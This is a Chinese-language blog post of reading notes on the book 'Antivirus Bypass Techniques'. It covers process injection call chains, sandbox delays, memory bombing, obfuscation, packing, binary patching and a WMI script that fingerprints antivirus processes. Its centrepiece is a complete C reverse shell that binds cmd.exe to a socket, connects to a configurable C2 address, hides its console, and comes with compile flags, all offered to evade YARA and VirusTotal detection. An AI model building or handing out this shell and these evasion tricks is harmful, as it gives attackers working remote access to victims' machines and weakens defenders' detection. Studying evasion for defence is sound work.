前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >读书笔记《antivirus-bypass-techniques》

读书笔记《antivirus-bypass-techniques》

作者头像
鸿鹄实验室
发布2021-08-25 10:17:37
8120
发布2021-08-25 10:17:37
举报
文章被收录于专栏:鸿鹄实验室

本文是基本图书《Antivirus Bypass Techniques: Learn practical techniques and tactics to combat, bypass, and evade antivirus software》的读书笔记,也就是一本免杀书籍,国内好久没有免杀类的书了,不如来看看国外的,有兴趣的可以自行找一找,下载看一下,亚马逊上也有,地址如下:

https://www.amazon.com/Antivirus-Bypass-Techniques-practical-techniques/dp/1801079749

前几章是对于windows基础的讲解,进程、线程、注册表啥的,这里就不多说了。

我们直接从bypass av的地方开始看。

第一部分,绕过动态扫描

1、进程注入

引用作者的话:

进程注入是用于动态绕过反病毒引擎的最常见技术之一。

反病毒引擎的最常用技术之一。许多反病毒软件供应商和软件开发商依靠所谓的

进程注入或代码注入来检查系统上运行的进程。使用进程注入,我们可以将恶意代码注入到操作系统内合法的进程中,从而避免被动态反病毒引擎发现。

引擎的检测。

一般的进程注入步骤如下

1. 确定一个目标进程,在其中注入代码。

2. 接收目标进程的句柄以访问其进程地址空间。

3. 分配一个虚拟内存地址空间,代码将被注入并执行。如果需要的话,分配一个执行标志。

4. 在目标进程的分配的内存地址空间中执行代码注入。

5. 最后,执行注入的代码。

1.1 Classic DLL injection

作者使用的是最基础的DLL injection,进程调用链如下:

代码语言:javascript
复制
OpenProcess---->VirtualAllocEx---->WriteProcessMemory---->CreateRemoteThread---->LoadLibrary/GetProcAddress

1.2 Process hollowing

进程镂空,进程调用链如下:

代码语言:javascript
复制
CreateProcess---->ZwUnmapViewOfSection/NtUnmapViewOfSection---->VirtualAllocEx---->WriteProcessMemory---->SetThreadContext and ResumeThread

1.3 Process doppelgänging

进程调用链如下:

代码语言:javascript
复制
CreateFileTransacted---->WriteFile---->NtCreateSection---->RollbackTransaction---->NtCreateProcessEx, RtlCreateProcessParametersEx,
VirtualAllocEx, WriteProcessMemory, NtCreateThreadEx,NtResumeThread

然后又附上了一些其他的注入方式

2、延时

有点反沙箱的意思,书里面介绍了Sleep()函数并不真正适用于反病毒,

我们必须使用其他函数--如GetTickCount、GetSystemTime、GetSystemTimeAsFileTime、QueryPerformanceCounter、timeGetTime......

3、Memory bombing

直译过来就是内存轰炸,利用分配大内存使得杀毒软件使用过多的资源在相对较大的内存上进行简单的扫描时迫使杀毒软件放弃检测我们的恶意文件(感觉怪怪的)然后分析了malloc()和calloc()的区别,并最后给出了一个POC

代码语言:javascript
复制
int main()
{
    char *memory_bombing = NULL;
    memory_bombing = (char *) calloc(200000000, sizeof(char));
    if(memory_bombing != NULL)
    {
        free(memory_bombing);
        payload();
    }
    return 0;
}

使用这类技术可以使得原生msf在vt上的爆毒减少10左右

第二部分,绕过静态扫描

1、混淆

1.1 Rename obfuscation

主要针对代码中的变量名。然后给出了一个py的在线混淆网站

https://pyob.oxyry.com/

对比

1.2 Control-flow obfuscation

控制流混淆将原始源代码转化为复杂的、不可读的和不明确的代码。例子:

1.3 绕过yara

就是绕过那个静态扫描的,可以不把恶意代码写入使用分离加载绕过

代码语言:javascript
复制
#include <winsock2.h>
#include <windows.h>
#include <ws2tcpip.h>
#pragma comment(lib, "Ws2_32.lib")
#define DEFAULT_BUFLEN 1024


void RunShell(char* C2Server, int C2Port) {
    while(true) {
        Sleep(5000);    // Five Second

        SOCKET mySocket;
        sockaddr_in addr;
        WSADATA version;
        WSAStartup(MAKEWORD(2,2), &version);
        mySocket = WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);
        addr.sin_family = AF_INET;
   
        addr.sin_addr.s_addr = inet_addr(C2Server);  
        addr.sin_port = htons(C2Port);    

        if (WSAConnect(mySocket, (SOCKADDR*)&addr, sizeof(addr), NULL, NULL, NULL, NULL)==SOCKET_ERROR) {
            closesocket(mySocket);
            WSACleanup();
            continue;
        }
        else {
            char RecvData[DEFAULT_BUFLEN];
            memset(RecvData, 0, sizeof(RecvData));
            int RecvCode = recv(mySocket, RecvData, DEFAULT_BUFLEN, 0);
            if (RecvCode <= 0) {
                closesocket(mySocket);
                WSACleanup();
                continue;
            }
            else {
                char Process[] = "cmd.exe";
                STARTUPINFO sinfo;
                PROCESS_INFORMATION pinfo;
                memset(&sinfo, 0, sizeof(sinfo));
                sinfo.cb = sizeof(sinfo);
                sinfo.dwFlags = (STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW);
                sinfo.hStdInput = sinfo.hStdOutput = sinfo.hStdError = (HANDLE) mySocket;
                CreateProcess(NULL, Process, NULL, NULL, TRUE, 0, NULL, NULL, &sinfo, &pinfo);
                WaitForSingleObject(pinfo.hProcess, INFINITE);
                CloseHandle(pinfo.hProcess);
                CloseHandle(pinfo.hThread);

                memset(RecvData, 0, sizeof(RecvData));
                int RecvCode = recv(mySocket, RecvData, DEFAULT_BUFLEN, 0);
                if (RecvCode <= 0) {
                    closesocket(mySocket);
                    WSACleanup();
                    continue;
                }
                if (strcmp(RecvData, "exit\n") == 0) {
                    exit(0);
                }
            }
        }
    }
}

int main(int argc, char **argv) {
    FreeConsole();
    if (argc == 3) {
        int port  = atoi(argv[2]); 
        RunShell(argv[1], port);
    }
    else {
        char host[] = "192.168.0.101";  // change this to your ip address
        int port = 4444;                //chnage this to your open port
        RunShell(host, port);
    }
    return 0;
}

编译

代码语言:javascript
复制
i686-w64-mingw32-g++ socket.cpp -o before_obfuscation.exe
-lws2_32 -lwininet -s -ffunction-sections -fdata-sections
-Wno-write-strings -fno-exceptions -fmerge-all-constants
-static-libstdc++ -static-libgcc -fpermissive

ps:以上都可以使用llvm来做

2、加密

2.1 Oligomorphic code

大体意思是每次运行选择不同的key解密自己

2.2 Polymorphic code

在此之上更加复杂,即key-->source形式

2.3 Metamorphic code

运行时改变恶意软件的内容,从而使自己发生变异。例如,这种变化可以使恶意软件增加完全无用的条件和变量,但对其功能没有影响,改变机器指令。

在不同的位置给自己添加无操作(NOP)指令,等等。

3、壳

这一部分没说什么太多的东西,文中使用的upx对国内不太友好,需要自己改upx。

第三部分,其他免杀技术

1、binary patching

利用patch技术,以nc为例,nc一开始是sub esp, 18

将18改成17

不影响文件运行,但在VT上面少了10个爆毒。

2、Timestomping

这个我感觉没什么用。就是改变文件创建时间

3、junk code

垃圾代码,跟上面的类似,一个开sockets的demo

4、技术总结

第四部分,红队操作中的免杀

一上来给了个wmi查杀软进程的脚本

代码语言:javascript
复制
import wmi
print("Antivirus Bypass Techniques by Nir Yehoshua and Uriel
Kosayev")
Proc = wmi.WMI()
AV_Check = ("MsMpEng.exe", "AdAwareService.exe", "afwServ.
exe", "avguard.exe", "AVGSvc.exe", "bdagent.
exe", "BullGuardCore.exe", "ekrn.exe", "fshoster32.
exe", "GDScan.exe", "avp.exe", "K7CrvSvc.exe", "McAPExe.
exe", "NortonSecurity.exe", "PavFnSvr.exe", "SavService.
exe", "EnterpriseService.exe", "WRSA.exe", "ZAPrivacyService.
exe")
for process in Proc.Win32_Process():
    if process.Name in AV_Check:
        print(f"{process.ProcessId} {process.Name}")
代码语言:javascript
复制
pyinstaller --onefile "Antivirus Fingerprinting.py"

国内就好多了,在线的很多,也方便也全面。然后这一部分就结束了。

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2021-08-12,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 鸿鹄实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档